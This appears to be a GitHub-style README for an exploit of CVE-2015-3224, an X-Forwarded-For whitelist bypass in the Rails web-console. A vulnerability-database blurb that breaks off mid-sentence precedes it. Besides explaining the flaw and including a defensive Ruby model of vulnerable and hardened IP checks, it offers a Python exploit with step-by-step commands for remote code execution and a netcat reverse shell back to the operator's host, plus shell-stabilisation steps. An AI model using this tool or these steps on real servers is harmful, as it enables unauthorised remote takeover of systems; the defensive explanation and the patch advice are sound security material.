
CVE-2015-3224 PoC: Ruby on Rails Web Console Code Injection Vulnerability

Related vulnerability
Title: Ruby on Rails Web Console Code Injection Vulnerability (CVE-2015-3224)
Description: Ruby on Rails (Rails) is an open-source web application framework written in Ruby, developed and maintained by the Rails core team; David Heinemeier Hansson extracted it from Basecamp, the project-management tool of the US company 37signals. Web Console is a Rails debugging tool that exposes an interactive Ruby console in the browser, through which arbitrary Ruby, and hence shell commands, can be run on the server. The request.rb file of the Web Console used by Ruby on Rails contains a security flaw: when determining the client IP address, the program does not restrict the use of the X-Forwarded-For header. A remote attacker can send a specially crafted request to exploit this
# Ruby on Rails Web Console Exploit (CVE-2015-3224)

![CVE-2015-3224](https://img.shields.io/badge/CVE-2015--3224-red.svg)

This repository contains a **Python script** that exploits an **IP whitelist bypass** in the developer web console (the `web-console` gem, versions before 2.1.3) shipped with **Ruby on Rails 4.x** applications, including 4.0.x and 4.1.x. Because the console evaluates Ruby inside the application process, bypassing the whitelist yields **remote code execution** on vulnerable servers.

> ⚠️ **Disclaimer**
> This script is intended for educational purposes and authorized security testing only.
> **Do not** use it on any system without explicit permission.
> The authors are **not responsible** for any misuse or damage caused by this script.

---

## 📌 Description of the Vulnerability

The web console is a development aid: it is mounted into the application (normally only in the development environment), and as its access control the gem compares the requesting client's IP address against `config.web_console.whitelisted_ips`, which defaults to `127.0.0.1` and `::1`. In the vulnerable versions that address is derived from the `X-Forwarded-For` HTTP header, a value the client itself supplies. A remote attacker therefore adds `X-Forwarded-For: 127.0.0.1` (or `::1`) to the request, **appears to be a trusted local user**, passes the whitelist and **gains unauthorized access** to the console. Since the console evaluates arbitrary Ruby in the server process, that access is **remote code execution** (for example via `system` or backticks). Two practical caveats: the application must actually load the gem, so a production deployment that keeps `web-console` in the `development` group is not reachable this way; and the remediation is to upgrade to `web-console` 2.1.3 or later, since an IP whitelist evaluated against a client-controlled header is not a control at all.
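To make the difference concrete, here is an added Ruby model of the two ways a whitelist check can derive the client address. It is written for this page and is not the `web-console` gem's code or the exploit script. It assumes a Rack-style `env` hash (`REMOTE_ADDR`, `HTTP_X_FORWARDED_FOR`), a localhost whitelist, a hypothetical trusted reverse-proxy range `10.0.0.0/8`, and constructed sample requests from an attacker at `203.0.113.9`. The vulnerable variant believes the header; the hardened variant only consults it when the TCP peer is one of our own proxies, and then reads the hop the proxy appended rather than the one the client wrote.

```ruby
require 'ipaddr'

# Illustrative model of the whitelist check (NOT the web-console gem's code).
# Default trusted addresses mirror the gem's documented localhost default.
WHITELIST = [IPAddr.new('127.0.0.1'), IPAddr.new('::1')].freeze

# Reverse proxies we operate (assumed for this example); only they may set X-Forwarded-For.
TRUSTED_PROXIES = [IPAddr.new('10.0.0.0/8')].freeze

# Parse an address string, returning nil instead of raising on garbage or nil,
# so a malformed header fails closed rather than crashing the check.
def parse_ip(str)
  IPAddr.new(str)
rescue ArgumentError # IPAddr::InvalidAddressError and AddressFamilyError are subclasses
  nil
end

def in_any?(ip_str, networks)
  ip = parse_ip(ip_str)
  !ip.nil? && networks.any? { |net| net.include?(ip) }
end

def allowed?(ip_str)
  in_any?(ip_str, WHITELIST)
end

# Vulnerable pattern (the CVE-2015-3224 class of bug): believe whatever the
# client put in X-Forwarded-For. The leftmost hop is attacker-controlled.
def client_ip_trusting_xff(env)
  xff = env['HTTP_X_FORWARDED_FOR']
  return xff.split(',').first.strip if xff && !xff.strip.empty?
  env['REMOTE_ADDR']
end

# Hardened pattern: start from the TCP peer address. Only if that peer is one
# of our own proxies do we look at X-Forwarded-For, and then we walk it from
# the right (the end our proxies appended) and stop at the first hop we did
# not add. An attacker-supplied "127.0.0.1" on the left is never reached.
def client_ip_hardened(env, trusted_proxies: TRUSTED_PROXIES)
  peer = env['REMOTE_ADDR']
  xff  = env['HTTP_X_FORWARDED_FOR']
  return peer unless xff && in_any?(peer, trusted_proxies)
  hops = xff.split(',').map(&:strip).reject(&:empty?)
  hops.reverse.find { |hop| !in_any?(hop, trusted_proxies) } || peer
end

def console_allowed_vulnerable?(env)
  allowed?(client_ip_trusting_xff(env))
end

def console_allowed_hardened?(env)
  allowed?(client_ip_hardened(env))
end

# Constructed Rack-style environments (sample data, not captured traffic).
SPOOFED    = { 'REMOTE_ADDR' => '203.0.113.9',
               'HTTP_X_FORWARDED_FOR' => '127.0.0.1' }.freeze
# Same attacker arriving through our proxy, which appended the real address.
VIA_PROXY  = { 'REMOTE_ADDR' => '10.0.0.2',
               'HTTP_X_FORWARDED_FOR' => '127.0.0.1, 203.0.113.9' }.freeze
REAL_LOCAL = { 'REMOTE_ADDR' => '127.0.0.1' }.freeze
MALFORMED  = { 'REMOTE_ADDR' => '203.0.113.9',
               'HTTP_X_FORWARDED_FOR' => '127.0.0.1 junk' }.freeze

if __FILE__ == $PROGRAM_NAME
  { 'spoofed' => SPOOFED, 'via proxy' => VIA_PROXY,
    'real localhost' => REAL_LOCAL, 'malformed' => MALFORMED }.each do |label, env|
    printf("%-15s vulnerable=%-5s hardened=%s\n", label,
           console_allowed_vulnerable?(env), console_allowed_hardened?(env))
  end
end
```

Run it with `ruby` to print the four cases: the spoofed request passes the vulnerable check and fails the hardened one. The hardened check still depends on your proxies appending the real client address; a proxy that forwards the header untouched would re-open the hole, so keep the gem upgrade as the actual fix. `IPAddr#include?` is also address-family strict: if IPv4-mapped IPv6 peers such as `::ffff:127.0.0.1` can reach the server, normalise them (`IPAddr#ipv4_mapped?`, `IPAddr#native`) before comparing.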

---

## 🚀 Features

-   **Easy to Use**: Simple command-line interface.
-   **Dynamic Path Discovery**: Automatically probes the target to find the dynamic console session path.
-   **Two Shell Modes**:
    -   **Simple Shell**: A basic, non-interactive shell for quick commands.
    -   **Reverse TTY Shell**: A one-line command to get a fully interactive PTY reverse shell.
-   **Enhanced Readability**: Color-coded output for status messages, successes, and errors.
-   **Robust**: Includes error handling for network issues and failed commands.

---

## ✅ Requirements

-   Python 3
-   `requests` library

Install `requests`:

```bash
pip install requests
```

---

## ⚙️ Usage

1.  **Clone the repository:**
    ```bash
    git clone https://github.com/Sic4rio/CVE-2015-3224
    cd CVE-2015-3224
    ```

2.  **Make the script executable:**
    ```bash
    chmod +x exploit.py
    ```

### Option 1: Simple Interactive Shell

This mode is useful for running quick, simple commands.

```bash
./exploit.py -t http://<TARGET_IP>:<PORT>
```

### Option 2: Full Interactive TTY (Reverse Shell)

This is the recommended mode for a stable, fully interactive shell.

#### Step 1: Start a Listener

On your local machine, open a new terminal and start a `netcat` listener.

```bash
nc -lvnp 9001
```

#### Step 2: Run the Exploit

In another terminal, run the script with the `--rev-shell` flag, providing your local IP (`lhost`) and port (`lport`).

```bash
./exploit.py -t http://<TARGET_IP>:<PORT> --rev-shell --lhost <YOUR_IP> --lport 9001
```

#### Step 3: Stabilize the Shell

A connection will arrive at your `netcat` listener. To upgrade it to a fully interactive TTY, run the following *in the terminal that is running netcat*:

1.  **Background the shell** by pressing `Ctrl+Z`.
2.  **Set your local terminal to raw mode** and bring the shell to the foreground.
    ```bash
    stty raw -echo; fg
    ```
    Press `Enter` if the prompt doesn't reappear.
3.  **Set the terminal properties** on the remote shell. Replace `50` and `120` with the values `stty size` reports in another local terminal so line wrapping and editors render correctly.
    ```bash
    reset
    export SHELL=bash
    export TERM=xterm-256color
    stty rows 50 cols 120
    ```
You now have a fully functional and stable shell.

---

## 👥 Credits

-   **Original Exploit**: Eval (@0xEval)
-   **The Readme.md file**: GPT
File snapshot

[4.0K] /data/pocs/7f38343f7d3d910c6e18a503265e253a048536d4
├── [6.5K] exploit.py
└── [3.3K] README.md

0 directories, 2 files